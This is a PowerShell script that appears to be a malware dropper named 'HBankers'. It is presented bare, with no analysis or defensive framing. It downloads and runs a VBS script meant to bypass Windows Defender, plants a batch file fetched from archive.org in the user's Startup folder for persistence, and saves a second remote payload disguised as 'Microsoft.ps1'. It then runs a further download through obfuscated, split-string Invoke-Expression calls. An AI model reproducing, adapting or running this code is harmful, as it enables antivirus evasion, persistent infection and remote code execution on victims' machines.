Function HBankers
{
$p = 'C:\Users\' + $env:UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\'
$ps1 = 'C:\Users\Public\'
start-sleep -s 9

(New-Object System.Net.WebClient).DownloadFile("https://raw.githubusercontent.com/NYAN-x-CAT/Bypass-Windows-Defender-VBS/master/script.vbs","$env:tmp\\script.vbs");(New-Object -com Shell.Application).ShellExecute("$env:tmp\\script.vbs")

start-sleep -s 9

if((New-Object System.Net.WebClient).DownloadFile('https://ia801503.us.archive.org/18/items/cmd_20210302/CMD.TXT', $p + 'Run.bat')){
}

start-sleep -s 9
if((New-Object System.Net.WebClient).DownloadFile('https://ia601402.us.archive.org/23/items/all_20210419_20210419_1344/ALL.txt' , $ps1 + 'Microsoft.ps1')){
}
$c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''https://ia601402.us.archive.org/23/items/all_20210419_20210419_1344/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
}
IEX HBankers